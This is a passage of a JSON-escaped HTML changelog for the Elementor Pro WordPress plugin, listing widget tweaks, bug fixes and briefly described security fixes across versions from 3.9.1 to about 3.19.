widget<\\/li>\\n<li>Tweak: Implemented CSS logical properties in Reviews widget<\\/li>\\n<li>Tweak: Implemented CSS logical properties in Countdown widget<\\/li>\\n<li>Tweak: Implemented CSS logical properties in Elementor Editor<\\/li>\\n<li>Tweak: Updated <code>jquery.smartmenus.js<\\/code> version from 1.1.1 to 1.2.0<\\/li>\\n<li>Fix: Dynamic Background Image does not load on the first Loop Item in a Loop Grid (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21489\\\">#21489<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22368\\\">#22368<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/23085\\\">#23085<\\/a>)<\\/li>\\n<li>Fix: History panel deprecation notices in console log<\\/li>\\n<li>Fix: Second Pro rollback installed the latest version instead of the specifically selected older version<\\/li>\\n<li>Fix: Incorrect position of the dropdown content when applying entrance animation in Menu Widget<\\/li>\\n<li>Fix: UX issues when using in-place editing in Menu widget<\\/li>\\n<li>Fix: Pagination with page reload is not working when used with the Taxonomy filter and Loop Grid widget in Archive template<\\/li>\\n<\\/ul>\\n<h4>3.18.2 - 2023-12-20<\\/h4>\\n<ul>\\n<li>Fix: Modified controls sanitization to enforce better security policies in Price List widget<\\/li>\\n<li>Fix: Error messages related to loop filter appear on front when using PHP 8.X and <code>WP_DEBUG<\\/code> is true<\\/li>\\n<\\/ul>\\n<h4>3.18.1 - 2023-12-06<\\/h4>\\n<ul>\\n<li>Fix: No results appeared when reloading the page with deep link and de-selecting terms in Taxonomy Filter widget<\\/li>\\n<li>Fix: No results appeared when filtering the Uncategorized category in Filter Taxonomy widget<\\/li>\\n<li>Fix: Notes still available when the Notes feature is deactivated<\\/li>\\n<\\/ul>\\n<h4>3.18.0 - 2023-12-04<\\/h4>\\n<ul>\\n<li>Tweak: Added the ability to upload files as attachments to emails in the File Upload field in Form widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4868\\\">#4868<\\/a>)<\\/li>\\n<li>Tweak: Introduced the capability to design and edit the empty state in the Loop Grid widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/24261\\\">#24261<\\/a>)<\\/li>\\n<li>Tweak: Implemented the option to close the menu content area with a click anywhere on the screen in Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22686\\\">#22686<\\/a>)<\\/li>\\n<li>Tweak: Improve scrolling behavior inside the content area when there is not enough space in Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22712\\\">#22712<\\/a>)<\\/li>\\n<li>Tweak: Expanded breakpoint options in Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22488\\\">#22488<\\/a>)<\\/li>\\n<li>Tweak: Added Logical Combination control in Taxonomy Filter widget<\\/li>\\n<li>Tweak: Added additional units to Horizontal and Vertical padding for Dropdown in WordPress Menu widget<\\/li>\\n<li>Tweak: Hide navigation arrows when there is only one slide in Loop Carousel and Carousel widgets<\\/li>\\n<li>Tweak: Added various HTML Tag controls in Video Playlist widget<\\/li>\\n<li>Tweak: Added responsive control to navigation size in Slides, Reviews, Media Carousel and Testimonial Carousel widgets<\\/li>\\n<li>Tweak: Added semantic <code><search><\\/code> wrapper in Search Form widget<\\/li>\\n<li>Tweak: Added semantic <code><search><\\/code> wrapper in Taxonomy Filter widget<\\/li>\\n<li>Tweak: Added Multiple Selection control in Taxonomy Filter widget<\\/li>\\n<li>Fix: Deprecated notice when using ${var} in strings instead of {$var} with PHP 8.2 (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/23927\\\">#23927<\\/a>)<\\/li>\\n<li>Fix: Dropdown indicator position issue in Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/23947\\\">#23947<\\/a>)<\\/li>\\n<li>Fix: Dynamic Tags are not available when choosing \'self-hosted\' source in Video widget<\\/li>\\n<li>Fix: Telephone field placeholder is aligned to the left in RTL websites in Form widget<\\/li>\\n<\\/ul>\\n<h4>3.17.1 - 2023-11-01<\\/h4>\\n<ul>\\n<li>Fix: Modified controls sanitization to enforce better security policies in Code Highlight, Form, Lottie, Price List, and Video Playlist widgets<\\/li>\\n<\\/ul>\\n<h4>3.17.0 - 2023-10-25<\\/h4>\\n<ul>\\n<li>Tweak: Added AJAX pagination option or seamless page navigation between content in Loop Grid widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1284\\\">#1284<\\/a>)<\\/li>\\n<li>Tweak: Introduced Individual Pagination option when multiple Post widgets are on the same page, providing enhanced control over pagination<\\/li>\\n<li>Tweak: Introduced Individual Pagination option when multiple Loop Grid widgets are on the same page, providing enhanced control over pagination<\\/li>\\n<li>Tweak: Added a None option to the breakpoint options in Menu widget<\\/li>\\n<li>Tweak: Added a horizontal scrolling option in Menu widget<\\/li>\\n<li>Tweak: Upgraded minimum required PHP version to 7.3<\\/li>\\n<li>Tweak: Improved accessibility when minimize button is disabled in Table of Content widget<\\/li>\\n<li>Fix: Table of Content widget without icons displays <code>undefined<\\/code> error (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17523\\\">#17523<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17768\\\">#17768<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18463\\\">#18463<\\/a>)<\\/li>\\n<li>Fix: Hover behavior issues on menu items in Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/23430\\\">#23430<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22431\\\">#22431<\\/a>)<\\/li>\\n<li>Fix: Links inside Loop Carousel are not working on initial load in Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/23705\\\">#23705<\\/a>)<\\/li>\\n<li>Fix: Popups accessible navigation adds outlines to the wrong first focusable element<\\/li>\\n<li>Fix: Dropdown area aligned to the left side of the screen if contains Tabs widget in Menu widget<\\/li>\\n<li>Fix: Content horizontal position not aligning correctly when used with carousel widgets in Menu widget<\\/li>\\n<li>Fix: Accessibility errors in PageSpeed Insights in Table of Contents widget<\\/li>\\n<\\/ul>\\n<h4>3.16.2 - 2023-09-20<\\/h4>\\n<ul>\\n<li>Fix: Fit to Content dropdown position calculation is incorrect in Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/23808\\\">#23808<\\/a>)<\\/li>\\n<li>Fix: Reverted hide navigation arrows when there is only one slide in the Loop or Nested carousel (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/23804\\\">#23804<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.16.1 - 2023-09-14<\\/h4>\\n<ul>\\n<li>Fix: Dynamic tag for ACF image field is not working as expected (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/23757\\\">#23757<\\/a>)<\\/li>\\n<li>Fix: Sticky functionality affects padding values in Container (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/23758\\\">#23758<\\/a>)<\\/li>\\n<li>Fix: HTML list issues for padding and margin in Menu widget<\\/li>\\n<\\/ul>\\n<h4>3.16.0 - 2023-09-12<\\/h4>\\n<ul>\\n<li>Tweak: Implemented accessibility improvements in Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/23607\\\">#23607<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22554\\\">#22554<\\/a>)<\\/li>\\n<li>Fix: \'Fallback: Recent Posts\' option malfunctions in the Query control (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21436\\\">#21436<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/23259\\\">#23259<\\/a>)<\\/li>\\n<li>Tweak: Hide navigation arrows when there is only one slide in the Loop or Nested carousel (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22056\\\">#22056<\\/a>)<\\/li>\\n<li>Tweak: Used appropriate image <code>alt<\\/code> in Testimonial Carousel widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17680\\\">#17680<\\/a>)<\\/li>\\n<li>Tweak: Optimized Scroll Snap functionality when using Container widget<\\/li>\\n<li>Tweak: Enhanced Elementor Role Manager functionality when using Containers<\\/li>\\n<li>Tweak: Added Notes feature to the Editor Top Bar<\\/li>\\n<li>Tweak: Replace CSS <code>float<\\/code> with other layouts in the Editor<\\/li>\\n<li>Tweak: Upgraded HTML Structure for the Menu widget<\\/li>\\n<li>Tweak: Implemented CSS logical properties in Carousel and Menu widgets<\\/li>\\n<li>Tweak: Added keyboard accessibility to a link in Posts widget<\\/li>\\n<li>Tweak: Loop Builder feature merged to version<\\/li>\\n<li>Fix: Addressed inconsistency in hover effect durations between icon, dropdown indicator colors, and text colors in the Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22376\\\">#22376<\\/a>)<\\/li>\\n<li>Fix: Slides break if the parent container is set to HTML A tag in Loop Carousel and Carousel widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22678\\\">#22678<\\/a>)<\\/li>\\n<li>Fix: The icon size setting is not affecting uploaded SVG icons in the Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22372\\\">#22372<\\/a>)<\\/li>\\n<li>Fix: Taxonomy filter does not work with slug in foreign characters (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/23315\\\">#23315<\\/a>)<\\/li>\\n<li>Fix: Improved code security enforcement in Dynamic Tags<\\/li>\\n<li>Fix: Sticky container incorrectly adjusts its width when transitioning from a smaller breakpoint to a larger one within the Editor<\\/li>\\n<\\/ul>\\n<h4>3.15.1 - 2023-08-09<\\/h4>\\n<ul>\\n<li>Fix: Improved code security enforcement in Table of Contents widget<\\/li>\\n<\\/ul>\\n<h4>3.15.0 - 2023-07-31<\\/h4>\\n<ul>\\n<li>New: Introducing Taxonomy Filter widget - Empower visitors to seamlessly filter listings in Loop Grids based on taxonomies (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3140\\\">#3140<\\/a>)<\\/li>\\n<li>Tweak: Added an "Offset Sides" functionality in Carousel and Loop Carousel widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21114\\\">#21114<\\/a>)<\\/li>\\n<li>Tweak: Modified the size of the Publish button in the Editor Top Bar feature (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22472\\\">#22472<\\/a>)<\\/li>\\n<li>Tweak: Improved Ajax permissions functionality for better security enforcement<\\/li>\\n<li>Tweak: Added option for pagination custom position in Carousel and Loop Carousel widgets<\\/li>\\n<li>Tweak: Added option for navigation custom position in Carousel and Loop Carousel widgets<\\/li>\\n<li>Tweak: Added additional styling options for navigation in Carousel and Loop Carousel widgets<\\/li>\\n<li>Tweak: Added labels to shortcode column in WordPress admin<\\/li>\\n<li>Tweak: Unified the appearance of <code>stretch<\\/code> and <code>center<\\/code> buttons in Menu widget<\\/li>\\n<li>Tweak: Unified the appearance of <code>stretch<\\/code> and <code>center<\\/code> buttons in My Account widget<\\/li>\\n<li>Tweak: Improved panel UI in Video Playlist widget<\\/li>\\n<li>Tweak: Implemented CSS logical properties in Elementor Editor<\\/li>\\n<li>Tweak: Added "Title HTML Tag" and "Description HTML Tag" in Price List widget<\\/li>\\n<li>Tweak: Added "Title HTML Tag" and "Description HTML Tag" in Slides widget<\\/li>\\n<li>Tweak: Added "Title HTML Tag" and "Description HTML Tag" in Flip Box widget<\\/li>\\n<li>Tweak: Added "Description HTML Tag" in Call To Action widget<\\/li>\\n<li>Security Fix: Improved code security enforcement in Share Buttons widget<\\/li>\\n<li>Security Fix: Improved code security enforcement in Form widget<\\/li>\\n<li>Fix: WooCommerce Status page failed to recognize Elementor WooCommerce widgets<\\/li>\\n<li>Fix: Pagination does not work inside single templates when using Posts and Loop Grid widgets<\\/li>\\n<li>Fix: Incorrect saving of WooCommerce page settings in Elementor site settings under certain scenarios<\\/li>\\n<\\/ul>\\n<h4>3.14.1 - 2023-06-26<\\/h4>\\n<ul>\\n<li>Tweak: Improved navigation on touch devices in Carousel widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22827\\\">#22827<\\/a>)<\\/li>\\n<li>Fix: Missing navigation arrows on lightbox in Gallery widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22870\\\">#22870<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.14.0 - 2023-06-19<\\/h4>\\n<ul>\\n<li>New: Introducing Carousel widget - Infinite design possibilities, and nesting capabilities (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2587\\\">#2587<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/219\\\">#219<\\/a>)<\\/li>\\n<li>Tweak: Added Static Item Position functionality to Alternate template in Loop Grid widget<\\/li>\\n<li>Tweak: Added visual indication of Page Parts<\\/li>\\n<li>Tweak: Added dividers option between menu items in Menu widget<\\/li>\\n<li>Tweak: Changed the HTML structure of Pagination and Navigation in Loop Carousel and Nested Carousel widgets<\\/li>\\n<li>Tweak: Added shop page in WooCommerce Pages section in Site Settings<\\/li>\\n<li>Tweak: Added Text Shadow, Box Shadow and Padding control to button in Call to Action widget<\\/li>\\n<li>Tweak: Added Lazy Load support for images in Video Playlist widget<\\/li>\\n<li>Tweak: Added <code>alt<\\/code> attribute to images in Video Playlist widget<\\/li>\\n<li>Tweak: Replaced select control with choose control for Flip Direction control in Flip Box widget<\\/li>\\n<li>Tweak: Added keyboard accessibility to Carousel and Loop Carousel widgets<\\/li>\\n<li>Tweak: Use <code>media_types<\\/code> array in Media controls<\\/li>\\n<li>Fix: Lightbox is still enabled after disabling it in the Site Settings in Gallery widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11193\\\">#11193<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19871\\\">#19871<\\/a>)<\\/li>\\n<li>Fix: Responsive settings for templates don\'t work as expected when Additional Custom Breakpoints feature is active (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16819\\\">#16819<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19394\\\">#19394<\\/a>)<\\/li>\\n<li>Fix: Inner containers are not presented as expected in Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21813\\\">#21813<\\/a>)<\\/li>\\n<li>Fix: Popup width does not support percentages (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22413\\\">#22413<\\/a>)<\\/li>\\n<li>Fix: PHP 8.x throws errors when using WooCommerce Ajax response (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22199\\\">#22199<\\/a>)<\\/li>\\n<li>Fix: Mini cart template appears as empty in various scenarios in Menu Cart widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22789\\\">#22789<\\/a>)<\\/li>\\n<li>Fix: Order by Price doesn\'t work for the Latest products or Manual Selection in Products widget<\\/li>\\n<li>Fix: Dropdown indicator icon is not vertically aligned to the text when using icon in Menu Widget<\\/li>\\n<li>Fix: Mixed content warning in the console for Video Playlist widget<\\/li>\\n<li>Fix: Preview settings are not presented as expected after first save in Loop Template<\\/li>\\n<li>Fix: Not-crawlable link error in Video Playlist widget<\\/li>\\n<li>Fix: Lightbox is still enabled after disabling it in the Site Settings in Logo widget<\\/li>\\n<li>Fix: Focus state issue on page load when using Table of Content widget<\\/li>\\n<\\/ul>\\n<h4>3.13.2 - 2023-05-22<\\/h4>\\n<ul>\\n<li>Fix: Hover settings not working as expected on Touch-Enabled devices in Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22258\\\">#22258<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.13.1 - 2023-05-11<\\/h4>\\n<ul>\\n<li>Security Fix: Addressed security weaknesses in access management related functions<\\/li>\\n<li>Fix: Excerpt content pulled from post content is showing with HTML tags in Loop Grid widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22367\\\">#22367<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.13.0 - 2023-05-08<\\/h4>\\n<ul>\\n<li>Tweak: Provided an option to assign excerpt automatically from post content in Post Excerpt dynamic tag (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/20256\\\">#20256<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21715\\\">#21715<\\/a>)<\\/li>\\n<li>Tweak: Added Display Conditions functionality in Editor Top bar (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21675\\\">#21675<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22050\\\">#22050<\\/a>)<\\/li>\\n<li>Tweak: Removed <code>elementor_page_id<\\/code> from request URLs in the WC AJAX calls (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18675\\\">#18675<\\/a>)<\\/li>\\n<li>Tweak: Added icons to menu items in Mega Menu widget (<a href=\\\"https:\\/\\/github.com\\/orgs\\/elementor\\/discussions\\/21602\\\">#21602<\\/a>)<\\/li>\\n<li>Tweak: Added keyboard accessibility to Toggle Button in WordPress Menu widget (<a href=\\\"https:\\/\\/github.com\\/orgs\\/elementor\\/discussions\\/2348\\\">#2348<\\/a>)<\\/li>\\n<li>Tweak: Added \'Active item state\' to top-level menu items for anchor links in the Menu widget<\\/li>\\n<li>Tweak: Added keyboard accessibility to navigation arrows in Loop Carousel widget<\\/li>\\n<li>Tweak: Added keyboard accessibility to navigation arrows in Slides widget<\\/li>\\n<li>Tweak: Added keyboard accessibility to navigation arrows in Media, Testimonial and Reviews Carousel widgets<\\/li>\\n<li>Tweak: Added keyboard accessibility to Table of Content widget<\\/li>\\n<li>Tweak: Added keyboard accessibility to Search Form widget<\\/li>\\n<li>Tweak: Added accessibility to images in Slides widget<\\/li>\\n<li>Tweak: Added accessibility to images in Call To Action widget<\\/li>\\n<li>Tweak: Added accessibility to images in Media Carousel widget<\\/li>\\n<li>Tweak: Added accessibility to images in Gallery widget<\\/li>\\n<li>Tweak: Added Lazy Load support for avatar image in Post Info widget<\\/li>\\n<li>Tweak: Added Lazy Load support to various Elementor Editor and Admin images<\\/li>\\n<li>Tweak: Added Lazy Load support for author image in Author Box widget<\\/li>\\n<li>Tweak: Added Lazy Load support for images in Price List widget<\\/li>\\n<li>Fix: Content width is affected by the widget\'s width when Content Width is set to Fit to Content in Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21842\\\">#21842<\\/a>)<\\/li>\\n<li>Fix: Empty value on Rows field causes an error in Products widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21451\\\">#21451<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.12.2 - 2023-04-09<\\/h4>\\n<ul>\\n<li>Fix: Mini cart template appears as empty in various WordPress themes (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21836\\\">#21836<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.12.1 - 2023-04-02<\\/h4>\\n<ul>\\n<li>Fix: Default background colors are presented as transparent in Popup (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21824\\\">#21824<\\/a>)<\\/li>\\n<li>Fix: Reverted the tweak of Form Submissions feature merged to the version (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21821\\\">#21821<\\/a>)<\\/li>\\n<li>Fix: Dropdown area is not closing when hovering outside of the content area in Menu widget<\\/li>\\n<\\/ul>\\n<h4>3.12.0 - 2023-03-29<\\/h4>\\n<ul>\\n<li>New: Introducing the Mega Menu with the new Menu widget - empowers you to achieve a much higher level of menu design, customization, and creativity<\\/li>\\n<li>New: Diversify your design with a Loop Alternate template - apply another template within your Loop Grid for design creativity<\\/li>\\n<li>New: Kickstart your workflow with predesigned Loop container-based templates<\\/li>\\n<li>Tweak: Added custom icon controls to various locations in Menu Cart widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/13678\\\">#13678<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17941\\\">#17941<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19295\\\">#19295<\\/a>)<\\/li>\\n<li>Tweak: Added a spacing control between navigation and slides in the Loop Carousel<\\/li>\\n<li>Tweak: Added responsive control to the \'Gap between slides\' control in the Loop Carousel<\\/li>\\n<li>Tweak: Added Custom CSS section in Loop Item template<\\/li>\\n<li>Tweak: Added an Article class metadata in Loop Item template<\\/li>\\n<li>Tweak: Added Lazy Load support for background images in CTA widget when using the Lazy Load Background Images experiment<\\/li>\\n<li>Tweak: Added Lazy Load support for background images in Flipbox widget when using the Lazy Load Background Images experiment<\\/li>\\n<li>Tweak: Added additional size units and custom units in all elements<\\/li>\\n<li>Tweak: Changed Nav Menu widget name to WordPress Menu widget<\\/li>\\n<li>Tweak: Added "Form Validation" control to Form widget<\\/li>\\n<li>Tweak: Updated custom messages in the Form widget<\\/li>\\n<li>Tweak: Improved accessibility in various elements in Gallery widget<\\/li>\\n<li>Tweak: Form Submissions feature merged to version<\\/li>\\n<li>Tweak: Loop feature promoted to Stable status<\\/li>\\n<li>Tweak: Page Transitions feature promoted to Stable status<\\/li>\\n<li>Tweak: Improved accessibility in filter bar in Gallery widget<\\/li>\\n<li>Tweak: Remove unused <code>aspect-ratio-*<\\/code> CSS classes<\\/li>\\n<li>Fix: Not all active breakpoints appear under "Advanced Rules" in popup publish settings (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17020\\\">#17020<\\/a>)<\\/li>\\n<li>Fix: Dynamic background image and video is not working with ACF in Loop Grid widget<\\/li>\\n<\\/ul>\\n<h4>3.11.7 - 2023-03-22<\\/h4>\\n<ul>\\n<li>Tweak: Improved code security enforcement in WooCommerce components<\\/li>\\n<\\/ul>\\n<h4>3.11.6 - 2023-03-14<\\/h4>\\n<ul>\\n<li>Tweak: Improved code security enforcement in Author Box and Countdown widgets<\\/li>\\n<\\/ul>\\n<h4>3.11.5 - 2023-03-12<\\/h4>\\n<ul>\\n<li>Fix: Hamburger Menu Toggle not showing if breakpoint is set to Tablet Extra in Nav Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21003\\\">#21003<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.11.4 - 2023-03-07<\\/h4>\\n<ul>\\n<li>Tweak: Prevented SVG file upload for better security enforcement in Forms widget<\\/li>\\n<\\/ul>\\n<h4>3.11.3 - 2023-02-26<\\/h4>\\n<ul>\\n<li>Fix: Error message appears when submitting a form placed below Loop Grid and Loop Carousel widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21432\\\">#21432<\\/a>)<\\/li>\\n<li>Fix: PHP 8.x compatibility issues in various places<\\/li>\\n<\\/ul>\\n<h4>3.11.2 - 2023-02-22<\\/h4>\\n<ul>\\n<li>Fix: Save & Back handle becomes inaccessible in various scenarios cases in Loop Carousel widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21316\\\">#21316<\\/a>)<\\/li>\\n<li>Fix: Can\'t edit page when using \'Content Tabs\' and \'Section\' options in Video Playlist widget<\\/li>\\n<\\/ul>\\n<h4>3.11.1 - 2023-02-15<\\/h4>\\n<ul>\\n<li>Fix: Featured Image dynamic tag is not working in Background images (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21313\\\">#21313<\\/a>)<\\/li>\\n<li>Fix: Time zone is not correct in Countdown widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17485\\\">#17485<\\/a>)<\\/li>\\n<li>Fix: File upload field is not working in Form widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21341\\\">#21341<\\/a>)<\\/li>\\n<li>Fix: Post Image Attachments dynamic tag is not working in various widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21314\\\">#21314<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.11.0 - 2023-02-13<\\/h4>\\n<ul>\\n<li>New: Introducing Loop Carousel widget - Create powerful & repeating loop templates and populate each one with dynamic content (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/219\\\">#219<\\/a>)<\\/li>\\n<li>New: Added Date and Time Range option to Advanced Rules in Popup<\\/li>\\n<li>Tweak: Improved accessibility when opening and closing a popup (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9788\\\">#9788<\\/a>)<\\/li>\\n<li>Tweak: Improved accessibility of full-screen mode in Search Form widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19907\\\">#19907<\\/a>)<\\/li>\\n<li>Tweak: Added keyboard accessibility support to Flip Box widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5861\\\">#5861<\\/a>)<\\/li>\\n<li>Tweak: Add <code>aria-label<\\/code> to read more link in Posts widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/13784\\\">#13784<\\/a>)<\\/li>\\n<li>Tweak: Use <code>aspect-ratio<\\/code> property instead of CSS trick in Media Carousel widget<\\/li>\\n<li>Tweak: Updated translation string in Stripe widget<\\/li>\\n<li>Fix: Masonry and Columns controls are not working as expected with responsive in Posts and Loop Grid widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/20670\\\">#20670<\\/a>)<\\/li>\\n<li>Fix: Invalid attributes names in Nav Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17400\\\">#17400<\\/a>)<\\/li>\\n<li>Fix: Post Image Attachments dynamic tag is not working as expected in various widgets<\\/li>\\n<li>Fix: Form fields order is not presented correctly when exported to CSV in Form Submissions<\\/li>\\n<li>Fix: Dynamic background image and video are not working with ACF in Loop Grid widget<\\/li>\\n<\\/ul>\\n<h4>3.10.3 - 2023-01-29<\\/h4>\\n<ul>\\n<li>Tweak: Added introduction video to loop item information modal in Theme Builder<\\/li>\\n<li>Fix: PHP 8.x throws errors and notices in some cases (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21087\\\">#21087<\\/a>)<\\/li>\\n<li>Fix: Infinite Scroll and Load on click pagination are not working as expected in Archive template<\\/li>\\n<li>Fix: Show row even when values do not exist in Form Submissions<\\/li>\\n<\\/ul>\\n<h4>3.10.2 - 2023-01-17<\\/h4>\\n<ul>\\n<li>Fix: Updated compatibility tag for Elementor v3.10<\\/li>\\n<\\/ul>\\n<h4>3.10.1 - 2023-01-09<\\/h4>\\n<p>Fix: Preview Could not be loaded error message appears on pages containing the Loop Grid in a header or footer templates<\\/p>\\n<h4>3.10.0 - 2023-01-09<\\/h4>\\n<ul>\\n<li>New: Added new dynamic tag for due date in Countdown widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7737\\\">#7737<\\/a>)<\\/li>\\n<li>Tweak: Added <code>modified<\\/code> and <code>comment_count<\\/code> to Order By in posts query control (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11159\\\">#11159<\\/a>)<\\/li>\\n<li>Tweak: Replaced <code>footer<\\/code> tag in Blockquote and Comments widgets for better semantics<\\/li>\\n<li>Fix: Compatibility issue in Imagify Media Library filters due to <code>_elementor_is_screenshot<\\/code> meta filter (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19988\\\">#19988<\\/a>)<\\/li>\\n<li>Fix: Hotspot Widget label icon height issues when Inline Font Icons experiment is active<\\/li>\\n<li>Fix: Editing glitch when using two loop grid widgets on the same page with the same loop item template<\\/li>\\n<li>Fix: Equal height is not working when using sections in Loop Grid widget<\\/li>\\n<li>Fix: Large amount of menu items are not appearing correctly on a mobile device in Nav Menu widget<\\/li>\\n<li>Fix: Featured Image does not change dynamically when using infinite\\/click pagination in Loop Grid widget<\\/li>\\n<li>Fix: Removed action call of non-existent <code>display_empty_cart_template()<\\/code> method in Cart widget<\\/li>\\n<\\/ul>\\n<h4>3.9.2 - 2022-12-21<\\/h4>\\n<ul>\\n<li>Fix: JS events do not trigger in Popups (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/20708\\\">#20708<\\/a>)<\\/li>\\n<li>Fix: PHP Errors appear when not using the toggle menu in Nav Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18636\\\">#18636<\\/a>)<\\/li>\\n<li>Fix: Popups\' backgrounds disappear when using Lazy Load Background Images experiment<\\/li>\\n<\\/ul>\\n<h4>3.9.1 - 2022-12-14<\\/h4>\\n<ul>\\n<li>Fix: WooCommerce Product Gallery dynamic tag is not working in Basic Gallery, Gallery and Image Carousel widgets (<a 